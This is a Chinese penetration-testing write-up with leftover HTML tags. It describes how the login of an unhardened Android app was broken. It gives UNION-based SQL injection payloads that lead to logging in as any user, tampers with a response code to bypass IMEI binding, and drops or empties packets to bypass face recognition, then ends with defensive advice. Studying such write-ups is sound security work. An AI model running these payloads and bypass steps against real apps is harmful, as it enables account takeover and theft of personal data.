App渗透测试：从SQL注入到人脸识别登录绕过<\/h1>

1. 目标应用分析<\/h2>

目标是一个具有登录功能的移动应用，具有以下特点：<\/p>

使用加密传输数据<\/li>
包含用户名密码登录、短信验证码登录和人脸识别功能<\/li>

未加壳、未混淆的Android应用<\/li> <\/ul>

2. 加密分析<\/h2>

2.1 加密定位<\/h3>

使用Jadx反编译APK<\/li>
搜索关键词"Encrypt"、"Decrypt"<\/li>

在Common.js中发现encryptData函数<\/li> <\/ol>

2.2 加密调试<\/h3>

将加密函数放入浏览器console调试<\/li>

确认加密算法可用<\/li> <\/ul>

3. SQL注入漏洞利用<\/h2>

3.1 注入点发现<\/h3>

原始请求：<\/p>

{
<\/span><\/span>  "userName"<\/span>: "TEST'"<\/span>,
<\/span><\/span>  "passWord"<\/span>: "123456"<\/span>,
<\/span><\/span>  "osType"<\/span>: "android"<\/span>,
<\/span><\/span>  "osVersion"<\/span>: "5.1.1"<\/span>,
<\/span><\/span>  "appVersion"<\/span>: "20.06.04"<\/span>,
<\/span><\/span>  "loginType"<\/span>: "1"<\/span>,
<\/span><\/span>  "model"<\/span>: "V1938T"<\/span>,
<\/span><\/span>  "brand"<\/span>: "vivo"<\/span>,
<\/span><\/span>  "imei"<\/span>: "865166023309431"<\/span>,
<\/span><\/span>  "version"<\/span>: "new"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>测试步骤：<\/p>

TEST'<\/code> → 返回异常<\/li>
TEST''<\/code> → 返回正常<\/li>
TEST'or'1'='1<\/code> → 返回正常<\/li>
<\/ol>
3.2 注入类型分析<\/h3>
后端逻辑推测：<\/p>
userInfo<\/span> =<\/span> 'select * from userinfo where username = <userName>'<\/span>;
<\/span><\/span>userPass<\/span> =<\/span> userInfo<\/span>.password<\/span>;
<\/span><\/span>if<\/span> (userPass<\/span> ==<\/span> <<\/span>passWord<\/span>><\/span>){
<\/span><\/span>    return<\/span> 'Login success'<\/span>;
<\/span><\/span>}else<\/span>{
<\/span><\/span>    return<\/span> 'Login failed'<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3 Union注入构造<\/h3>
3.3.1 确定字段数<\/h4>
TEST'union\/**\/select\/**\/null,null,null,null,null,null,null,null,null from dual--
<\/span><\/span><\/span><\/code><\/pre>发现字段数为9个<\/p>
3.3.2 确定字段类型<\/h4>
TEST'union\/**\/select\/**\/1,'<\/span>123<\/span>','<\/span>123<\/span>','<\/span>123<\/span>','<\/span>123<\/span>','<\/span>123<\/span>','<\/span>123<\/span>','<\/span>123<\/span>',1 from dual--
<\/span><\/span><\/span><\/code><\/pre>3.3.3 定位密码字段<\/h4>
TEST'union\/**\/select\/**\/1,'<\/span>123<\/span>','<\/span>123<\/span>','<\/span>Ceshi123@@@<\/span>','<\/span>123<\/span>','<\/span>123<\/span>','<\/span>123<\/span>','<\/span>123<\/span>',1 from dual--
<\/span><\/span><\/span><\/code><\/pre>发现第4个字段为密码字段<\/p>
4. 获取真实用户信息<\/h2>
4.1 利用忘记密码功能<\/h3>

爆破用户名字典<\/li>
获取有效用户名列表<\/li>
<\/ul>
4.2 通过短信验证码登录<\/h3>

获取验证码<\/li>
解密返回包获取用户完整信息：

username<\/li>
staffId<\/li>
email<\/li>
staffName<\/li>
tel\/mobile<\/li>
<\/ul>
<\/li>
<\/ul>
5. 构造完整攻击Payload<\/h2>
TEST'union\/**\/select\/**\/<staffId>,'<\/span>Qwe123@@@<\/span>','<\/span><<\/span>userName><\/span>','<\/span>Qwe123@@@<\/span>','<\/span><<\/span>mobile><\/span>','<\/span><<\/span>mobile><\/span>','<\/span><<\/span>email><\/span>','<\/span>865166023309431<\/span>',<staffId> from dual--
<\/span><\/span><\/span><\/code><\/pre>6. IMEI绑定绕过<\/h2>

输入任意验证码<\/li>
拦截返回包<\/li>
修改resultCode从1001(失败)改为1000(成功)<\/li>
<\/ol>
7. 人脸识别绕过<\/h2>
7.1 首次人脸检测<\/h3>

拦截手机发向服务器的包<\/li>
直接丢弃该数据包<\/li>
<\/ul>
7.2 大数据包处理<\/h3>

拦截包含人脸数据的包<\/li>
将人脸数据替换为空<\/li>
转发修改后的数据包<\/li>
<\/ul>
8. 完整攻击流程总结<\/h2>

反编译APK定位加密函数<\/li>
测试发现SQL注入点<\/li>
构造Union注入确定字段信息<\/li>
利用忘记密码功能获取有效用户名<\/li>
通过短信验证码登录获取完整用户信息<\/li>
构造完整Union注入Payload实现任意用户登录<\/li>
绕过IMEI绑定验证<\/li>
拦截并修改人脸识别相关数据包<\/li>
最终成功登录系统<\/li>
<\/ol>
9. 防御建议<\/h2>


输入验证：<\/p>

对所有用户输入进行严格过滤<\/li>
使用参数化查询<\/li>
<\/ul>
<\/li>

加密改进：<\/p>

不要在前端暴露完整加解密算法<\/li>
考虑使用证书固定<\/li>
<\/ul>
<\/li>

人脸识别安全：<\/p>

服务端应验证人脸数据的完整性<\/li>
实现多因素认证<\/li>
<\/ul>
<\/li>

其他：<\/p>

对APK进行混淆和加固<\/li>
实现完善的日志监控和异常检测<\/li>
<\/ul>
<\/li>
<\/ol>